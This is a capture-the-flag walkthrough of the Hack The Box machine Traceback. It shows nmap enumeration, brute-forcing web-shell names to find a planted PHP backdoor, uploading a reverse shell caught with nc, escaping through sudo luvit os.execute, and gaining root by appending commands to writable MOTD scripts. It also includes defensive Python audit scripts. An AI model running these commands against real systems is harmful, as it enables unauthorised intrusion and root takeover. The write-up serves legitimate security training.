Traceback.htb

This is a detailed walkthrough for traceback.htb written by dR1PPy

HTB machines can be challenging, frustrating, and rewarding, sometimes all at once.

I think the machine TraceBack strikes a perfect balance of all three of those qualities and makes for a very fun experience.

So far this is my favorite machine of 2020; many thanks to Xh4H for putting this challenge together.

Enumeration

As always NMAP all the things!

Nmap scan report for traceback.htb (10.10.10.181)
Host is up, received user-set (0.070s latency).
Scanned at 2020-03-26 17:41:30 MDT for 69s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbMNfxYPZGAdOf2OAbwXhXDi43/QOeh5OwK7Me/l15Bej9yfkZwuLhyslDCYIvi4fh/2ZxB0MecNYHM+Sf4xR/CqPgIjQ+NuyAPI/c9iXDDhzJ+HShRR5WIqsqBHwtsQFrcQXcfQFYlC+NFj5ro9wfl2+UvDO6srTUxl+GaaabePYm2u0mlmfwHqlaQaB8HOUb436IdavyTdvpW7LTz4qKASrCTPaawigDymMEQTRYXY4vSemIGMD1JbfpErh0mrFt0Hu12dmL6LrqNmUcbakxOXvZATisHU5TloxqH/p2iWJSwFi/g0YyR2JZnIB65fGTLjIhZsOohtSG7vrPk+cZ
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2jCEklOC94CKIBj9Lguh3lmTWDFYq41QkI5AtFSx7x+8uOCGaFTqTwphwmfkwZTHL1pzOMoJTrGAN8T7LA2j0=
|   256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4LOW9SgPQeTZubVmd+RsoO3fhSjRSWjps7UtHOc10p
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The initial scan reveals only the common services: SSH and HTTP.
While dirsearch runs we browse the web pages.

On the default URL http://traceback.htb we find the following page, which suggests a backdoor has been left on the box.

We Google for the name taking credit for the backdoor and find the following GitHub repo.

https://github.com/Xh4H/Web-Shells

Using the file names shown in the repo we create a short list:

alfa3.php
alfav3.0.1.php
alfav3-encoded.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

And feed it into Burp for testing.

One request comes back with a hit, which gives us the name of our backdoor.
https://10.10.10.181/smevk.php

We try to login with the default admin:admin and gain access to the backdoor.
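The short list above is also what a defender would hunt for in a web root, with one caveat the rest of this writeup makes obvious: a shell dropped under a random name never matches a name list. The following Python script is an added example for this writeup, not code from the original post or from the Web-Shells repo it references. It walks a directory tree and reports two signals: a basename that matches the known web-shell names from the page, and any script file that is not in a deployment manifest (the manifest, the `.phtml` extension and the sample web root it builds are assumptions for the demo).

```python
"""Web-root web-shell hunt (added example, not from the writeup).

Signal 1: basename matches a known web-shell filename (list copied from the
          writeup, which took it from the Xh4H/Web-Shells repo).
Signal 2: a script file that is absent from the deployment manifest, which
          is the only way to catch a shell renamed to a random string.
"""
import os
import tempfile

# Names from the writeup's short list
KNOWN_SHELL_NAMES = {
    "alfa3.php", "alfav3.0.1.php", "alfav3-encoded.php", "andela.php",
    "bloodsecv4.php", "by.php", "c99ud.php", "cmd.php",
    "configkillerionkros.php", "jspshell.jsp", "mini.php",
    "obfuscated-punknopass.php", "punk-nopass.php", "punkholic.php",
    "r57.php", "smevk.php", "wso2.8.5.php",
}

# Extensions treated as server-side scripts; .phtml is an assumption
SCRIPT_EXTENSIONS = (".php", ".phtml", ".jsp")


def hunt(webroot, manifest):
    """Return a sorted list of (path relative to webroot, reason).

    `manifest` is the set of relative paths the deployment is expected to
    contain (assumed to be maintained by the defender).
    """
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), webroot)
            if name in KNOWN_SHELL_NAMES:
                findings.append((rel, "known web-shell filename"))
            elif name.lower().endswith(SCRIPT_EXTENSIONS) and rel not in manifest:
                findings.append((rel, "script not in deployment manifest"))
    return sorted(findings)


# Constructed sample: one legitimate page, one image, the smevk.php backdoor
# from the writeup, and a randomly named shell like the one uploaded later.
DEMO_FILES = ("index.php", "img/logo.png", "smevk.php", "O2me7yuLMZkMrQZYcg.php")
DEMO_MANIFEST = {"index.php", "img/logo.png"}


def build_demo_webroot():
    """Create the constructed web root in a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in DEMO_FILES:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // placeholder\n" if rel.endswith(".php") else "")
    return root


def demo():
    """Run the hunt over the constructed web root and return its findings."""
    return hunt(build_demo_webroot(), DEMO_MANIFEST)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Against a real host the manifest would come from the deployment artifact (package file list, git tree, build output); without it, signal 2 degrades to "every script is suspicious", which is still a useful starting point on a box that should only serve static pages.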

Gaining Access

Now that we have a PHP backdoor we need to upgrade it to an actual shell.
We modify pentestmonkey's PHP reverse shell.

PRO TIP: Since this is a popular machine at the moment we rename our PHP shell to a random name.
This helps prevent other users from finding our shell and mistaking it for part of the challenge.

mv php-reverse-shell.php `openssl rand -base64 18`.php

Then we use the upload feature of Xh4H's backdoor to upload our reverse shell, start a listener, and visit the file to get our shell.

http://10.10.10.181/O2me7yuLMZkMrQZYcg.php

nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.10] from traceback.htb [10.10.10.181] 45796
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:37:27 up 18:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
webadmin

After running our enumeration scripts we see that sudo lets us run luvit as the sysadmin user.
We can leverage this to get a shell like so.

$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
whoami
sysadmin
python3 -c 'import pty; pty.spawn("/bin/bash")'
TERM=linux

Now we grab our user flag and run our enumeration scripts again.
Initially we do not find any of the common paths to escalation.

But we do notice one process in the enumeration output.

root      26039  0.0  0.0  58792  3164 ?        S    10:48   0:00 /usr/sbin/CRON -f
root      26042  0.0  0.0   4628   796 ?        Ss   10:48   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root      26043  0.0  0.0   7468   772 ?        S    10:48   0:00 sleep 30

To get a better look at what this process is doing we will leverage pspy.

./pspy64 -pf -i 1000 
...
2020/04/07 11:06:01 CMD: UID=0    PID=29010  | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/04/07 11:06:01 CMD: UID=0    PID=29008  | /usr/sbin/CRON -f 
2020/04/07 11:06:01 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 CMD: UID=0    PID=29014  | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ 
2020/04/07 11:06:31 FS:                 OPEN | /usr/lib/locale/locale-archive
2020/04/07 11:06:31 FS:        CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2020/04/07 11:07:01 FS:                 OPEN | /usr/lib/locale/locale-archive
2020/04/07 11:07:01 CMD: UID=0    PID=29020  | sleep 30 

This shows us exactly which files the cron job restores from the backup directory each minute.

Escalating Privileges

Taking a closer look at the files in question shows us some interesting rights.

ls -lha  /var/backups/.update-motd.d/*
-rwxr-xr-x 1 root root  981 Aug 25  2019 /var/backups/.update-motd.d/00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 /var/backups/.update-motd.d/10-help-text
-rwxr-xr-x 1 root root 4.2K Aug 25  2019 /var/backups/.update-motd.d/50-motd-news
-rwxr-xr-x 1 root root  604 Aug 25  2019 /var/backups/.update-motd.d/80-esm
-rwxr-xr-x 1 root root  299 Aug 25  2019 /var/backups/.update-motd.d/91-release-upgrade

ls -lha /etc/update-motd.d/ 
total 32K
drwxr-xr-x  2 root sysadmin 4.0K Aug 27  2019 .
drwxr-xr-x 80 root root     4.0K Apr  6 17:33 ..
-rwxrwxr-x  1 root sysadmin  981 Apr  7 11:14 00-header
-rwxrwxr-x  1 root sysadmin  982 Apr  7 11:14 10-help-text
-rwxrwxr-x  1 root sysadmin 4.2K Apr  7 11:14 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Apr  7 11:14 80-esm
-rwxrwxr-x  1 root sysadmin  299 Apr  7 11:14 91-release-upgrade

The listing shows that after the restore the files in /etc/update-motd.d are root-owned but group sysadmin and group-writable (rwxrwxr-x), while the backup copies are root-only.
This means we, as sysadmin, can edit the MOTD scripts, which run as root when the MOTD is displayed at login.
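The check a defender wants here is a straight audit of the permissions shown above. The Python script below is an added example for this writeup, not code from the original post: it walks one update-motd.d style directory and reports every entry (the directory itself included, since write access to it lets a user replace the scripts) that is group-writable, world-writable, or not owned by the trusted uid, which defaults to root. The constructed demo directory mirrors the box's listing, with two scripts at mode 775 and one at 755; because the demo files are owned by whoever runs it, the demo passes its own uid as the trusted owner.

```python
"""Audit an update-motd.d directory for scripts a non-root user could modify
(added example, not from the writeup).

pam_motd runs every script in /etc/update-motd.d as root at login, so any
entry that a non-root user can write is a root code-execution path.
"""
import os
import stat
import tempfile


def audit_motd_dir(directory, trusted_uid=0):
    """Return a sorted list of (path, problem) for every entry that someone
    other than `trusted_uid` could modify. An empty list means clean."""
    problems = []
    entries = [directory] + [os.path.join(directory, n) for n in os.listdir(directory)]
    for path in entries:
        st = os.stat(path)
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid != trusted_uid:
            problems.append((path, f"owned by uid {st.st_uid}, not uid {trusted_uid}"))
        if mode & stat.S_IWGRP:
            problems.append((path, f"group-writable (mode {mode:04o}, gid {st.st_gid})"))
        if mode & stat.S_IWOTH:
            problems.append((path, f"world-writable (mode {mode:04o})"))
    return sorted(problems)


def build_demo_dir():
    """Constructed sample mirroring the box: directory 755, two scripts left
    group-writable (775) as on the box, one correctly set to 755."""
    d = tempfile.mkdtemp(prefix="update-motd.d-")
    os.chmod(d, 0o755)
    for name, mode in (("00-header", 0o775), ("10-help-text", 0o775), ("50-motd-news", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nprintf 'motd\\n'\n")
        os.chmod(p, mode)
    return d


def demo():
    """Audit the constructed directory, then re-audit after the fix
    (chmod 755 on every script). Returns (before, after); `before` carries
    basenames instead of full temp paths so results are stable."""
    d = build_demo_dir()
    me = os.getuid()  # demo files are owned by the current user, not root
    before = [(os.path.basename(p), why) for p, why in audit_motd_dir(d, trusted_uid=me)]
    for name in os.listdir(d):
        os.chmod(os.path.join(d, name), 0o755)
    after = audit_motd_dir(d, trusted_uid=me)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for name, why in before:
        print(f"{name}: {why}")
    print("after fix:", "clean" if not after else after)
```

On a real host run `audit_motd_dir("/etc/update-motd.d")` and `audit_motd_dir("/var/backups/.update-motd.d")` with the root default; note that a cron job copying clean content over these files, as on this box, does not reset their ownership or mode, so the audit stays red until the permissions themselves are fixed.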

For this we need proper SSH access to the box, since the MOTD scripts run on SSH login.
We are unable to modify any files under .ssh for the sysadmin user, but we can for the webadmin user.
So we generate a key pair and add it to webadmin's authorized_keys to get SSH access as that account.

ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/webadmin/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/webadmin/.ssh/id_rsa.
Your public key has been saved in /home/webadmin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:RImGFNltn9odBfmVWLkuZ/ycKtYJw3HFL0ZUcnrdmD4 webadmin@traceback
The key's randomart image is:
+---[RSA 2048]----+
|   .o= o..  .+*o=|
|    o +.+   ..o@+|
|     . ... . +=.*|
|       .  o..o+o.|
|        So..ooE. |
|        . .+.. * |
|            + =.o|
|           o o .o|
|          . ...  |
+----[SHA256]-----+
$ pwd
/home/webadmin/.ssh
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3gzMMwPw97r98wQl+cKjN4u3lJAfzSMIyHJgDulh6KG9amG5BpWhUiMUFI6uW77cRSu+C+Vs8tebAxsYL8hCBb07l/qUgRWFxTS2JeP9ol+Wfo6b4wc1aFh6QwhrsU70JxLvjziLjJ2ylykdD/NtSKS6t6YpNaWJxnyp9pIv3fyGeCI67GNcdj3BeqHUuX68I6XsRIiZ7+uhX7zAV5hopKECtC/cCoTDUWIljq97vmTbyObQv/fKY9qqLYdiG7LhXvJRjmcTFYkib2aJhguYZjEr9J+466+aikclOYLs7InSrSejisfn9XCwBH2BAy0hhLqtXEXvOj4ERWLhQJUBx webadmin@traceback
$ ls
authorized_keys
id_rsa
id_rsa.pub
$ cat id_rsa.pub >> authorized_keys
$ ssh-keyscan -H -t rsa 10.10.10.181 >> known_hosts
$ ssh 10.10.10.181
Pseudo-terminal will not be allocated because stdin is not a terminal.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

Now we need to determine where best to place our code.
We will start with a simple PoC to verify we get code execution.
For this we need two console terminals open, one for each user (webadmin and sysadmin).

From our box we run the following command to log in as webadmin.
The leading sleep gives us 7 seconds to prepare our payload before the login triggers it.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb

Then, as the sysadmin user, we append our PoC to the first MOTD script:

echo "sleep 5 && whoami">> /etc/update-motd.d/00-header

Back in our SSH console we see the following.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

root


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Apr  7 15:17:35 2020 from 10.10.14.10
webadmin@traceback:~$ 

The result of 'whoami' is root, which proves we have code execution as root.
Instead of setting up another reverse shell we simply change the payload to read the flag and run the same commands again.

echo "sleep 5 && cat /root/root.txt">> /etc/update-motd.d/00-header

Now our SSH console shows the root flag.

sleep 7 && ssh -i webadmin-ssh.id webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

<FLAG REMOVED FOR WRITEUP>


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Apr  7 15:18:12 2020 from 10.10.14.10
webadmin@traceback:~$ 

Overall, TraceBack was a very fun challenge.

Resources

GitHub of Backdoor
https://github.com/Xh4H/Web-Shells

PHP Shell
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
